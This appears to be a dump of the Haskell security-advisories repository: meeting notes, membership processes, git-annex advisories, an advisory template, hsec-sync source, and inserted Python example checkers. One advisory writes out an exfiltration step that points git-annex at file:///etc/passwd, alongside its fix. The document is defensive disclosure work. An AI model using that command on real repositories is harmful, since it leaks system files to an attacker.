13 | 14 | ## How to make the announcement 15 | 16 | - official announcement: on discourse 17 | - David: suggests doing so after there are ~5 real advisories in the repo 18 | - We should give a few days heads up to projects that the public might think support it but don't at the start 19 | - Announcement should include: 20 | - Short-term plans (e.g. OSV integration) 21 | - Long-term goals (cabal audit, Stack, Hackage, etc) 22 | - Fraser will draft on mailing list next week 23 | 24 | ## Initial content 25 | 26 | - List of known security issues: https://github.com/haskell/security-advisories/issues/32 27 | - We should validate that the CVSS is correct while creating the advisory, rather than taking it at face value 28 | - Relevant post: https://daniel.haxx.se/blog/2023/06/12/nvd-damage-continued/ 29 | - Fraser plans to work on a CVSS toolkit in Haskell 30 | - David will create one for the TOML parser on Monday 31 | 32 | ## ZuriHac 33 | 34 | - a lot of people were excited 35 | - folks wondered why it was empty 36 | - One volunteer pull request 37 | - FT it was a great contribution! 38 | - David's general comments: 39 | - GHC workshop went well 40 | - Getting folks together to contribute to important core stuff is very good. 41 | - Future thoughts: projects for Cabal / Hackage integration. 42 | 43 | ## Other community interest 44 | - Casey: Should we look into letting Linux distributions know about us so we can get their reports? 45 | - Fraser: Let's rely on the OSV tooling and hope that projects are consuming those streams. Also, most distros package only the dependencies for particular programs they want (e.g. pandoc) so we would have (a little) extra work to determine which distros are affected by an advisory. 46 | 47 | 48 | # hsec-tools tooling 49 | 50 | - support for multiple references, instead of single-valued "url" field, with the types supported by OSV (e.g. 
advisory, blog post, etc) 51 | - We presently parse it as CommonMark, but we store the rendered HTML in the advisory datatype. We should instead store the CommonMark, because that's what's needed for OSV. 52 | - Store original text or AST or both? We should try and see. 53 | - Can we migrate to `pandoc-types`? David didn't pick them to avoid GPL constraints, but it seems that the Pandoc integration is doable with BSD after all (the types package is BSD3). We should migrate. 54 | - *pandoc* is GPL, so static site builder w/ Hakyll needs to be a separate package under GPL, which consumes our libraries. 55 | - We should (not urgent) extract OSV bits to a dedicated package. 56 | - FT plans to write a CVSS library. -------------------------------------------------------------------------------- /advisories/published/2023/HSEC-2023-0013.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2023-0013" 4 | cwe = [312] 5 | keywords = ["historical"] 6 | aliases = ["CVE-2014-6274"] 7 | 8 | [[affected]] 9 | package = "git-annex" 10 | cvss = "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" 11 | [[affected.versions]] 12 | introduced = "0.20110401" 13 | fixed = "5.20140919" 14 | 15 | [[references]] 16 | type = "ADVISORY" 17 | url = "https://git-annex.branchable.com/security/CVE-2014-6274/" 18 | [[references]] 19 | type = "ARTICLE" 20 | url = "https://git-annex.branchable.com/upgrades/insecure_embedded_creds/" 21 | ``` 22 | 23 | # *git-annex* plaintext storage of embedded credentials on encrypted remotes 24 | 25 | *git-annex* had a bug in the **S3** and **Glacier** remotes where if 26 | `embedcreds=yes` was set, and the remote used `encryption=pubkey` or 27 | `encryption=hybrid`, the embedded AWS credentials were stored in the 28 | Git repository in (effectively) plaintext, not encrypted as they 29 | were supposed to be. 
30 | 31 | That means that anyone who gets a copy of the Git repository can 32 | extract the AWS credentials from it. Which would be bad. 33 | 34 | A remote with this problem cannot be enabled using `git annex 35 | enableremote`. Old versions of *git-annex* will fail with a GPG 36 | error; the current version will fail with a pointer to the upstream 37 | *git-annex* security page linked above. 38 | 39 | ## Remediation 40 | 41 | If your repository has this problem, choose one of these 42 | approaches to deal with it: 43 | 44 | 1. Change your AWS credentials, so the ones stored in the clear in 45 | git won't be used. 46 | 47 | After changing the credentials, make sure you have a fixed 48 | version of git-annex, and you can then re-embed the new creds 49 | into the repository, encrypted this time, by setting the 50 | `AWS_SECRET_ACCESS_KEY` and `AWS_ACCESS_KEY_ID` environment 51 | variables, and running `git annex enableremote $remotename 52 | embedcreds=yes`. 53 | 54 | 2. Fix the problem and then remove the history of the *git-annex* 55 | branch of the repository. 56 | 57 | Make sure you have a fixed version of *git-annex*, and force 58 | *git-annex* to rewrite the embedded creds, with encryption this 59 | time, by setting the `AWS_SECRET_ACCESS_KEY` and 60 | `AWS_ACCESS_KEY_ID` environment variables, and running `git annex 61 | enableremote $remotename embedcreds=yes`. 62 | 63 | Then, to get rid of old versions of the *git-annex* branch that 64 | still contain the creds in cleartext, you can use `git annex 65 | forget`; note that it will remove other historical data too. 66 | 67 | Keep in mind that this will not necessarily delete data from 68 | clones you do not control. 69 | 70 | 3. If you're sure that you're the only one who has access to the 71 | repository, you could decide to leave it as-is. It's no more 72 | insecure than if you had used `encryption=shared` in the first 73 | place when setting it up.
74 | -------------------------------------------------------------------------------- /docs/membership.md: -------------------------------------------------------------------------------- 1 | # SRT members and membership processes 2 | 3 | ## Current members 4 | 5 | - Fraser Tweedale (SRT project leader; 2023-05–) 6 | - Gautier Di Folco (2023-05–) 7 | - Lei Zhu (2024-10–) 8 | - Mihai Maruseac (2023-05–) 9 | - Montez Fitzpatrick (2024-10–) 10 | - Tristan de Cacqueray (2023-05–) 11 | 12 | ## Former members 13 | 14 | We thank past members for their valuable contributions! 15 | 16 | - Casey Mattingly (2023-05–2024-06) 17 | 18 | ## Member onboarding (and offboarding) 19 | 20 | There are some necessary tasks when members join or leave the SRT. 21 | These are: 22 | 23 | - Update the member lists in this document. 24 | 25 | - Add (or remove) the member from the 26 | `security-advisories[at]haskell.org` mailing list. Contact the 27 | [Haskell Infrastructure Admins][haskell-infra] for assistance. 28 | 29 | - Add (or remove) the member from the VINCE group, if they are 30 | participating in that capacity. 31 | 32 | - Update the member list at https://www.haskell.org/security/. 33 | By pull request against 34 | [haskell-infra/www.haskell.org](https://github.com/haskell-infra/www.haskell.org/). 35 | 36 | - Announce the membership change(s) on [Discourse]. Usually this 37 | could be included in the quarterly report. 38 | 39 | - Add (or remove) the member as a maintainer of SRT-owned [Hackage 40 | packages](./packages.md), if appropriate. 41 | 42 | [haskell-infra]: https://github.com/haskell-infra/haskell-admins 43 | [Discourse]: https://discourse.haskell.org/ 44 | 45 | 46 | ## Running a Call for Volunteers 47 | 48 | To fill vacancies or grow the SRT, run a *Call for Volunteers*. 49 | The following is a rough guide on how we do that. 50 | 51 | - For previous calls, we appointed an SRT member to receive the 52 | applications (to their personal email address). 
53 | 54 | - *After applications close*, they compile the applications and 55 | share with the rest of the SRT for review. We start a voting 56 | thread on the mailing list, each member states their preferred 57 | applicant(s) with summary reasons, and we reach a consensus. This 58 | process has worked well, so far. 59 | 60 | - See [example content](call-for-volunteers-example.md). There are 61 | some placeholders to be filled. The content can be modified as 62 | needed. 63 | 64 | - Publish the call on [Discourse] and promote it in the logical ways 65 | (e.g. Haskell Foundation social media, r/haskell, etc). 66 | 67 | - The application period should be about 4 weeks. Bump and do 68 | another burst of promotion at the halfway point. 69 | 70 | - After the application deadline, the full SRT membership reviews 71 | the proposals and selects the new member(s). 72 | 73 | - Notify the successful applicant(s) and seek their affirmation that 74 | they are prepared to join the SRT. 75 | 76 | - Notify unsuccessful applicants before public announcement of the 77 | outcome. 78 | 79 | - Commence onboarding and notify the community of the outcome. 80 | -------------------------------------------------------------------------------- /meeting-notes/2023-08-09.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2023-08-09 2 | 3 | [Previous meeting notes](https://github.com/haskell/security-advisories/blob/main/meeting-notes/2023-07-26.md) 4 | 5 | ## Previous AIs: 6 | 7 | - Mihai 8 | - Will follow up for project contacts for embargoed issues 9 | - Look into GHCup #858 -- still in progress 10 | - Everyone 11 | - Send David the email address used by your Bitwarden account 12 | so it can be added to HF's organization. 
13 | - FT 14 | - Documentation of repo structure, including symlinks 15 | - Documentation about dates - that they are retrieved from Git history 16 | - full history required, not shallow clone 17 | - Create GH issue to design HSEC ID reservation feature 18 | - re Base readFloat, update bgamari that advisory exists 19 | - ping pandoc folks, ask them to submit advisories 20 | - someone 21 | - Requirements/guidelines for dependency analysis tooling 22 | - Start writing them down, commit to our repo 23 | 24 | ## Pandoc 25 | 26 | - New pandoc issue: https://github.com/jgm/pandoc/security/advisories/GHSA-xj5q-fv23-575g 27 | - Related issue: https://github.com/jgm/pandoc/issues/8584 28 | - Security section of manual: https://pandoc.org/MANUAL.html#a-note-on-security 29 | 30 | 31 | ## Recording affected symbols 32 | 33 | - Tristan looking into it 34 | - Some doubts about how to record e.g. type class instances 35 | - GitHub issue we can use for discussion: https://github.com/haskell/security-advisories/issues/86 *"Leverage the declaration field to specify which function is affected"* 36 | 37 | 38 | ## ID reservation 39 | 40 | - PR: https://github.com/haskell/security-advisories/pull/114 41 | - `hsec-tools reserve-id --assign --commit` 42 | - TODO: add diagnostic output e.g. "Reserved HSEC-YYYY-NNNN.md" 43 | 44 | 45 | ## Publishing hsec-tools to hackage?
46 | 47 | - We should probably do it some time :) 48 | - Maybe extract OSV library first, and land the toml library change first 49 | 50 | ## Purl parsing 51 | 52 | - [spec](https://github.com/package-url/purl-spec) 53 | - [Hackage](https://github.com/package-url/purl-spec/blob/master/PURL-TYPES.rst#hackage) 54 | - Casey started work on this 55 | - We should define and propose to haskell community a *profile* of Purl, in particular how to represent 56 | - Package components (`lib`, `exe:`, `lib:`) 57 | - Cabal flags (`[+-]`) 58 | - There is a hackage namespace defined for Purl, but it does not suggest how to represent these data 59 | 60 | 61 | ## Action Items 62 | - Bitwarden accounts? 63 | - Mihai: 64 | - Progress on embargoed items 65 | - Look into GHCup #858 -- still in progress 66 | - Tristan: rebase the toml-parser PR#88 67 | 68 | - David: Encourage Pandoc devs to test out our advisory process 69 | - FT: Documentation of repo structure 70 | - FT: Diagnostic output (created file XYZ) 71 | - FT to publish PR for (currently WIP) enhancement to record package components in HSEC security-advisories 72 | -------------------------------------------------------------------------------- /code/hsec-sync/hsec-sync.cabal: -------------------------------------------------------------------------------- 1 | cabal-version: 2.4 2 | name: hsec-sync 3 | version: 0.2.0.2 4 | 5 | -- A short (one-line) description of the package. 6 | synopsis: Synchronize with the Haskell security advisory database 7 | 8 | -- A longer description of the package. 9 | description: Synchronize with the Haskell security advisory database. 10 | 11 | -- A URL where users can report bugs. 12 | -- bug-reports: 13 | 14 | -- The license under which the package is released. 15 | license: BSD-3-Clause 16 | author: Gautier DI FOLCO 17 | maintainer: gautier.difolco@gmail.com 18 | 19 | -- A copyright notice. 
-- copyright:
category: Data
extra-doc-files: CHANGELOG.md, overview.png, recommended-workflow.png, README.md
tested-with:
  GHC ==8.10.7 || ==9.0.2 || ==9.2.8 || ==9.4.8 || ==9.6.6 || ==9.8.3 || ==9.10.1 || ==9.12.1

library
  exposed-modules: Security.Advisories.Sync
  other-modules:
    Security.Advisories.Sync.Snapshot
    Security.Advisories.Sync.Url

  build-depends:
    , base >=4.14 && <5
    , bytestring >=0.10 && <0.13
    , directory >=1.3 && <1.4
    , either >=5.0 && <5.1
    , extra >=1.7 && <1.9
    , filepath >=1.4 && <1.6
    , http-client >=0.7.0 && <0.8
    , lens >=5.1 && <5.4
    , tar >=0.5 && <0.7
    , temporary >=1 && <2
    , text >=1.2 && <3
    , transformers >=0.5 && <0.7
    , wreq >=0.5 && <0.6
    , zlib >=0.6 && <0.8

  hs-source-dirs: src
  default-language: Haskell2010
  ghc-options:
    -Wall -Wcompat -Widentities -Wincomplete-record-updates
    -Wincomplete-uni-patterns -Wpartial-fields -Wredundant-constraints

executable hsec-sync
  main-is: Main.hs

  -- Modules included in this executable, other than Main.
  -- other-modules:

  -- LANGUAGE extensions used by modules in this package.
  -- other-extensions:
  build-depends:
    , base >=4.14 && <5
    , hsec-sync
    , optparse-applicative >=0.17 && <0.19

  hs-source-dirs: app
  default-language: Haskell2010
  ghc-options:
    -Wall -Wcompat -Widentities -Wincomplete-record-updates
    -Wincomplete-uni-patterns -Wpartial-fields -Wredundant-constraints

test-suite spec
  type: exitcode-stdio-1.0
  hs-source-dirs: test
  main-is: Spec.hs
  other-modules: Spec.SyncSpec
  build-depends:
    , base
    , directory
    , filepath
    , hsec-sync
    , tasty <2
    , tasty-hunit <0.11
    , temporary >=1 && <2

  default-language: Haskell2010
  ghc-options:
    -Wall -Wcompat -Widentities -Wincomplete-record-updates
    -Wincomplete-uni-patterns -Wpartial-fields -Wredundant-constraints

--------------------------------------------------------------------------------
/code/hsec-sync/src/Security/Advisories/Sync.hs:
--------------------------------------------------------------------------------
{-# LANGUAGE DerivingStrategies #-}
{-# LANGUAGE LambdaCase #-}

module Security.Advisories.Sync
  ( Snapshot (..),
    SnapshotUrl (..),
    defaultSnapshot,
    githubSnapshot,
    SyncStatus (..),
    sync,
    RepositoryStatus (..),
    status,
  )
where

import Control.Monad.IO.Class (liftIO)
import Control.Monad.Trans.Except (runExceptT, withExceptT)
import Security.Advisories.Sync.Snapshot
import Security.Advisories.Sync.Url

data Snapshot = Snapshot
  { snapshotRoot :: FilePath,
    snapshotUrl :: SnapshotUrl
  }

defaultSnapshot :: Snapshot
defaultSnapshot =
  githubSnapshot
    "security-advisories"
    "https://github.com/haskell/security-advisories"
    "generated/snapshot-export"

githubSnapshot :: FilePath -> String -> String -> Snapshot
githubSnapshot root repoUrl repoBranch =
  Snapshot
    { snapshotRoot = root,
      snapshotUrl = SnapshotUrl $ ensureFile (mkUrl [repoUrl, "archive/refs/heads", repoBranch]) <> ".tar.gz"
    }

data SyncStatus
  = Created
  | Updated
  | AlreadyUpToDate
  deriving stock (Eq, Show)

sync :: Snapshot -> IO (Either String SyncStatus)
sync s =
  runExceptT $ do
    snapshotStatus <- liftIO $ snapshotRepositoryStatus $ snapshotRoot s
    ensuredStatus <- withExceptT explainSnapshotError $ ensureSnapshot (snapshotRoot s) (snapshotUrl s) snapshotStatus
    case ensuredStatus of
      SnapshotRepositoryCreated ->
        return Created
      SnapshotRepositoryExisting -> do
        repoStatus <- liftIO $ status' s snapshotStatus
        if repoStatus == DirectoryOutDated
          then do
            withExceptT explainSnapshotError $ overwriteSnapshot (snapshotRoot s) (snapshotUrl s)
            return Updated
          else return AlreadyUpToDate

data RepositoryStatus
  = DirectoryMissing
  | -- | Used when expected files/directories are missing or not readable
    DirectoryIncoherent
  | DirectoryUpToDate
  | DirectoryOutDated
  deriving stock (Eq, Show)

status :: Snapshot -> IO RepositoryStatus
status s =
  status' s =<< snapshotRepositoryStatus (snapshotRoot s)

status' :: Snapshot -> SnapshotRepositoryStatus -> IO RepositoryStatus
status' s =
  \case
    SnapshotDirectoryMissing ->
      return DirectoryMissing
    SnapshotDirectoryIncoherent ->
      return DirectoryIncoherent
    SnapshotDirectoryInitialized -> do
      snapshotInfo <- getDirectorySnapshotInfo $ snapshotRoot s
      case snapshotInfo of
        Left _ ->
          return DirectoryOutDated
        Right info -> do
          update <- runExceptT $ latestUpdate $ snapshotUrl s
          return $
            case update of
              Right latestETag | latestETag == etag info ->
                DirectoryUpToDate
              _ ->
                DirectoryOutDated

--------------------------------------------------------------------------------
/EXAMPLE_ADVISORY.md:
--------------------------------------------------------------------------------
```toml

[advisory]
# Submit PRs with HSEC-0000-0000, or run `hsec-tools next-id` to
# print the next available ID.
id = "HSEC-0000-0000"
cwe = []

# Arbitrary keywords. We recommend including keywords relating
# to the protocols, data formats or services pertaining to the
# affected package (e.g. "json", "tls", "aws"). You can also
# include keywords describing the vulnerability or impact (e.g.
# "dos", "sqli", "csrf"). Just think, "what keywords would I use
# if I was searching for issues affecting this package, or a
# particular class of vulnerabilities?"
keywords = ["example", "freeform", "keywords"]

# Corresponding and related advisory IDs. You could include
# CVE, GHSA or other well known databases, as well as other
# HSEC IDs in the `related` field.
aliases = ["CVE-2022-XXXX"]
related = ["CVE-2022-YYYY", "CVE-2022-ZZZZ"]

# You can declare multiple affected packages
[[affected]]

# Declare the affected package/component via ONE of the
# following options
#
# OPTION 1: package = hackage-package-name
package = "package-name"
#
# OPTION 2: alternative-hackage-package = hackage-package-name
# repository-url = "https://hackage.example.org/"
# repository-name = "example"
# package = "package-name"
#
# OPTION 3: ghc-component = {ghc,ghci,rts,ghc-pkg,runghc,ghc-iserv,hp2ps,hpc,hsc2hs,haddock}
# ghc-component = "ghci"

# CVSS vector. Accepted versions: 2.0, 3.0, 3.1
cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"

# arch = ["x86", "x86_64"]
# os = ["mingw32"]
# declarations = { "Acme.Broken.function" = ">= 1.1.0 && < 1.2.0", "Acme.Broken.renamedFunction" = ">= 1.2.0 && < 1.2.0.5"}

# Versions affected by the vulnerability.
#
# The `fixed` field is optional. You can specify multiple ranges
# (for example, if the issue was introduced in multiple release
# series). In the case of multiple ranges, use `fixed` to "close"
# a range, even when the release series does not actually have a
# fix. For example, if an issue was introduced in 1.0.8 and 1.1.2
# (but 1.1 is unaffected), and a fix has not been released for the
# 1.0.x series, specify:
[[affected.versions]]
introduced = "1.0.8"
fixed = "1.1"
[[affected.versions]]
introduced = "1.1.2"

# References to articles, issues/PRs, etc. Recognised types:
# ADVISORY, ARTICLE, DETECTION, DISCUSSION, REPORT,
# FIX, INTRODUCED, PACKAGE, EVIDENCE, WEB
[[references]]
type = "ARTICLE"
url = "https://example.com"
```

# Advisory Template - Title Goes Here

This is an example template for an advisory. Please copy this to packages/ and rename it to HSEC-0000-0000.md.

In this section of the advisory you can write an extended description of the vulnerability.

* Markdown formatted
* TOML "front matter". See README.md for schema.
* Please include as much detail as you'd like.

A well structured advisory will include information like:

> Acme Broken implements safe internal mutation using `unsafePerformIO`. However, in a multithreaded context, an attacker can cause a service to return the wrong answer by forcing an interleaving of writes that violates internal invariants. The flaw was corrected by replacing uses of `IORef` with `MVar` in commit abc123.
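The version-range rule from the template comments, as an added example in Python (not code from the security-advisories project): a deliberately narrow parser that reads only `package`/`ghc-component`, `introduced` and `fixed` out of the `[[affected]]` tables of an advisory's front matter, and a check for whether a given version falls in any range. `SAMPLE_ADVISORY`, the `acme-broken` package name and all function names are constructed for this example.

```python
"""Affected-version check for HSEC advisory front matter (added example).

Not code from the security-advisories project. `affected_ranges` reads only
the `package`/`ghc-component`, `introduced` and `fixed` string keys of the
[[affected]] / [[affected.versions]] tables (a subset, not a TOML parser).
`is_affected` applies the template's rule: `introduced` is inclusive,
`fixed` is exclusive, and a range without `fixed` is open-ended.
SAMPLE_ADVISORY and the package name `acme-broken` are constructed.
"""
from __future__ import annotations

import re
from typing import Dict, List, Tuple

FENCE = "`" * 3  # built this way so the sample cannot close this code block
TOML_FENCE = re.compile(re.escape(FENCE) + r"toml[ \t]*\n(.*?)\n" + re.escape(FENCE), re.DOTALL)
STRING_KV = re.compile(r'^([A-Za-z_-]+)\s*=\s*"([^"]*)"$')

# Constructed sample: the two-range case the template comments describe
# (introduced in 1.0.8 and 1.1.2, 1.1 unaffected, no fix for 1.0.x yet).
SAMPLE_ADVISORY = "\n".join([
    FENCE + "toml",
    "[advisory]",
    'id = "HSEC-0000-0000"',
    "cwe = []",
    "",
    "[[affected]]",
    'package = "acme-broken"',
    'cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"',
    "[[affected.versions]]",
    'introduced = "1.0.8"',
    'fixed = "1.1"',
    "[[affected.versions]]",
    'introduced = "1.1.2"',
    "",
    "[[references]]",
    'type = "ARTICLE"',
    'url = "https://example.com/#fragment"',
    FENCE,
    "",
    "# Advisory Template - Title Goes Here",
    "",
    "Body text is ignored by the parser.",
])


def advisory_front_matter(markdown: str) -> str:
    """Return the TOML text inside the leading toml fence of an advisory."""
    match = TOML_FENCE.search(markdown)
    if match is None:
        raise ValueError("no toml front matter block found")
    return match.group(1)


def affected_ranges(toml_text: str) -> Dict[str, List[Dict[str, str]]]:
    """Map each affected package/component to its [[affected.versions]] ranges."""
    ranges: Dict[str, List[Dict[str, str]]] = {}
    component = None  # set by `package`/`ghc-component` in the open [[affected]]
    current = None    # the open [[affected.versions]] table, if any
    for raw in toml_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):  # any table header
            if line == "[[affected.versions]]":
                if component is None:
                    raise ValueError("[[affected.versions]] before package is declared")
                current = {}
                ranges.setdefault(component, []).append(current)
            else:  # [[affected]], [advisory], [[references]], ...: start over
                component, current = None, None
            continue
        match = STRING_KV.match(line)
        if match is None:
            continue  # arrays and other non-string keys are not needed here
        key, value = match.groups()
        if key in ("package", "ghc-component") and current is None:
            component = value
        elif key in ("introduced", "fixed") and current is not None:
            current[key] = value
    return ranges


def parse_version(text: str) -> Tuple[int, ...]:
    """Parse a Cabal-style dotted version; tuples order like Data.Version."""
    parts = text.strip().split(".")
    if not all(part.isdigit() for part in parts):
        raise ValueError(f"not a dotted numeric version: {text!r}")
    return tuple(int(part) for part in parts)


def is_affected(version: str, version_ranges: List[Dict[str, str]]) -> bool:
    """True if `version` lies in any range: introduced <= v < fixed."""
    v = parse_version(version)
    for rng in version_ranges:
        low = parse_version(rng["introduced"])
        high = parse_version(rng["fixed"]) if "fixed" in rng else None
        if v >= low and (high is None or v < high):
            return True
    return False


if __name__ == "__main__":
    found = affected_ranges(advisory_front_matter(SAMPLE_ADVISORY))
    for ver in ("1.0.7", "1.0.8", "1.1", "1.1.1", "1.1.2", "2.0"):
        print(ver, "affected" if is_affected(ver, found["acme-broken"]) else "not affected")
```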

--------------------------------------------------------------------------------
/advisories/published/2023/HSEC-2023-0010.md:
--------------------------------------------------------------------------------
```toml
[advisory]
id = "HSEC-2023-0010"
cwe = [200, 610]
keywords = ["exfiltration", "historical"]
aliases = ["CVE-2018-10857"]

[[affected]]
package = "git-annex"
cvss = "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
[[affected.versions]]
introduced = "0"
fixed = "6.20180626"

[[references]]
type = "ADVISORY"
url = "https://git-annex.branchable.com/security/CVE-2018-10857_and_CVE-2018-10859/"
```

# *git-annex* private data exfiltration to compromised remote

Some uses of git-annex were vulnerable to a private data exposure
and exfiltration attack. It could expose the content of files
located outside the *git-annex* repository, or content from a
private web server on localhost or the LAN. Joey Hess discovered
this attack.

To perform this attack, the attacker needs to have control over one
of the remotes of the victim's *git-annex* repository. For example,
they may provide a public *git-annex* repository that the victim
clones. Or, equivalently, the attacker could have read access to the
victim's *git-annex* repository or a repository it pushes to, and
some channel to get commits into it (e.g. pull requests).

These exploits are most likely to succeed when the victim is running
the `git-annex` assistant, or is periodically running `git annex
sync --content`.

To perform the attack the attacker runs `git-annex addurl --relaxed
file:///etc/passwd` and commits this to the repository in some out
of the way place. After the victim's git repository receives that
change, `git-annex` follows the attacker-provided URL to the private
data, which it stores in the *git-annex* repository. From there it
transfers the content to the remote *git-annex* repository that the
attacker has access to.

As well as `file:///` URLs, the attacker can use URLs to private web
servers. The URL can also be one that the attacker controls, that
redirects to a URL that is accessible to the victim system (and not
necessarily the compromised remote).

## Fix

The issue was fixed by making `git-annex` refuse to follow
`file:///` URLs and URLs pointing to private/local IP addresses by
default. Two new configuration settings,
`annex.security.allowed-url-schemes` and
`annex.security.allowed-ip-addresses`, can relax this security
policy, and are intended for cases where the *git-annex* repository
is kept private and so the attack does not apply.

## Impact on external special remotes

One variant of this issue can exploit a vulnerable external special
remote, and could not be prevented by `git-annex`. (`git-annex`'s
own built-in special remotes are not vulnerable to this attack.)

In this attack variant, the attacker guesses the hash of a file
stored on the victim's private web server, and adds it to the
`git-annex` repository. The attacker also has control of the server
hosting an encrypted special remote used by the victim's *git-annex*
repository. They cause that server to redirect to the victim's web
server. This allows the attacker to verify if the victim's web
server contains a file that the attacker already knows the content
of, assuming they can guess the URL to it.

Developers of external special remotes are encouraged to prevent
this attack by not following such HTTP redirects.
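The default policy from the fix above, written out in Python as an added example (not git-annex's own code): reject `file:` URLs and hosts that resolve to private or local addresses, allow the two relaxations the advisory names (an allow-list of schemes and of networks), and apply the same check to every hop of a redirect chain so that a public host redirecting to localhost is caught, which is the point the external-special-remote section makes. DNS lookup is injected and `CONSTRUCTED_DNS` is made up; all names and signatures are assumptions of this example.

```python
"""URL policy check modelled on the git-annex fix (added example).

Not git-annex's own code. The defaults encode the two rules the advisory
describes (no file: URLs; no hosts that resolve to a private, loopback or
link-local address); the two UrlPolicy fields mirror the two relaxations
(allowed schemes, allowed networks); check_redirect_chain applies the same
rule to every hop. Hostname lookup is injected so the example runs offline;
CONSTRUCTED_DNS is made up for this example.
"""
from __future__ import annotations

import ipaddress
from dataclasses import dataclass
from typing import Callable, Iterable, List, Tuple, Union
from urllib.parse import urlsplit

IPAddress = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]
IPNetwork = Union[ipaddress.IPv4Network, ipaddress.IPv6Network]
Resolver = Callable[[str], List[str]]  # hostname -> list of IP strings


@dataclass(frozen=True)
class UrlPolicy:
    # Default: only http(s). "file" is deliberately absent.
    allowed_schemes: frozenset = frozenset({"http", "https"})
    # Local ranges that may still be fetched, e.g. a trusted LAN mirror.
    allowed_networks: Tuple[IPNetwork, ...] = ()


def is_local_address(ip: IPAddress) -> bool:
    """Addresses that must never be fetched on a remote's say-so."""
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_unspecified or ip.is_reserved or ip.is_multicast)


def resolve_host(host: str, resolve: Resolver) -> List[IPAddress]:
    """Literal IPs are used as-is; names go through the injected resolver."""
    try:
        return [ipaddress.ip_address(host)]
    except ValueError:
        return [ipaddress.ip_address(a) for a in resolve(host)]


def check_url(url: str, policy: UrlPolicy, resolve: Resolver) -> Tuple[bool, str]:
    """Decide whether one URL may be fetched under `policy`; fails closed."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in policy.allowed_schemes:
        return False, f"scheme {scheme!r} is not allowed"
    host = parts.hostname
    if not host:
        return False, "URL has no host"
    try:
        addresses = resolve_host(host, resolve)
    except (OSError, ValueError) as exc:
        return False, f"cannot resolve {host!r}: {exc}"
    if not addresses:
        return False, f"{host!r} resolves to no address"
    # Every answer must pass: a name returning one public and one loopback
    # address is still a route to the loopback address.
    for ip in addresses:
        if is_local_address(ip) and not any(ip in net for net in policy.allowed_networks):
            return False, f"{host!r} resolves to local address {ip}"
    return True, "ok"


def check_redirect_chain(urls: Iterable[str], policy: UrlPolicy,
                         resolve: Resolver) -> Tuple[bool, str]:
    """Apply the policy to the original URL and to each redirect target."""
    for hop, url in enumerate(urls):
        ok, reason = check_url(url, policy, resolve)
        if not ok:
            return False, f"hop {hop} ({url}): {reason}"
    return True, "ok"


# Constructed lookup table standing in for DNS (93.184.216.x are public).
CONSTRUCTED_DNS = {
    "mirror.example.org": ["93.184.216.34"],
    "intranet.example.lan": ["10.0.0.5"],
    "localhost": ["127.0.0.1"],
    "rebind.example.org": ["93.184.216.35", "127.0.0.1"],  # mixed answer
}


def example_resolve(host: str) -> List[str]:
    if host not in CONSTRUCTED_DNS:
        raise OSError(f"no such host: {host}")
    return CONSTRUCTED_DNS[host]


DEFAULT_POLICY = UrlPolicy()
LAN_POLICY = UrlPolicy(allowed_networks=(ipaddress.ip_network("10.0.0.0/8"),))

if __name__ == "__main__":
    print(check_url("file:///etc/passwd", DEFAULT_POLICY, example_resolve))
    chain = ["https://mirror.example.org/archive.tar.gz", "http://localhost/secret"]
    print(check_redirect_chain(chain, DEFAULT_POLICY, example_resolve))
```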
79 | -------------------------------------------------------------------------------- /code/hsec-sync/app/Main.hs: -------------------------------------------------------------------------------- 1 | {-# LANGUAGE OverloadedStrings #-} 2 | 3 | module Main where 4 | 5 | import Control.Monad (join) 6 | import Options.Applicative 7 | import Security.Advisories.Sync 8 | import System.Exit (die) 9 | import System.IO (hPutStrLn, stderr) 10 | 11 | main :: IO () 12 | main = 13 | join $ 14 | customExecParser 15 | (prefs showHelpOnEmpty) 16 | cliOpts 17 | 18 | cliOpts :: ParserInfo (IO ()) 19 | cliOpts = info (commandsParser <**> helper) (fullDesc <> header "Haskell Advisories tools") 20 | where 21 | commandsParser :: Parser (IO ()) 22 | commandsParser = 23 | hsubparser 24 | ( command "sync" (info commandSync (progDesc "Synchronize a local Haskell Security Advisory repository snapshot")) 25 | <> command "status" (info commandStatus (progDesc "Check the status of a local Haskell Security Advisory repository snapshot")) 26 | ) 27 | 28 | commandSync :: Parser (IO ()) 29 | commandSync = go <$> repositoryParser 30 | where 31 | go snapshot = do 32 | result <- sync snapshot 33 | case result of 34 | Left e -> 35 | die e 36 | Right s -> do 37 | putStrLn $ 38 | "Snapshot at " 39 | <> show (snapshotRoot snapshot) 40 | <> " from " 41 | <> show (getSnapshotUrl $ snapshotUrl snapshot) 42 | putStrLn $ 43 | case s of 44 | Created -> "Snapshot just created" 45 | Updated -> "Snapshot updated" 46 | AlreadyUpToDate -> "Snapshot already up-to-date" 47 | 48 | commandStatus :: Parser (IO ()) 49 | commandStatus = go <$> repositoryParser 50 | where 51 | go snapshot = do 52 | result <- status snapshot 53 | hPutStrLn stderr $ 54 | case result of 55 | DirectoryMissing -> "Directory is missing" 56 | DirectoryIncoherent -> "Directory is incoherent" 57 | DirectoryUpToDate -> "Repository is up-to-date" 58 | DirectoryOutDated -> "Repository is out-dated" 59 | 60 | repositoryParser :: Parser Snapshot 61 | 
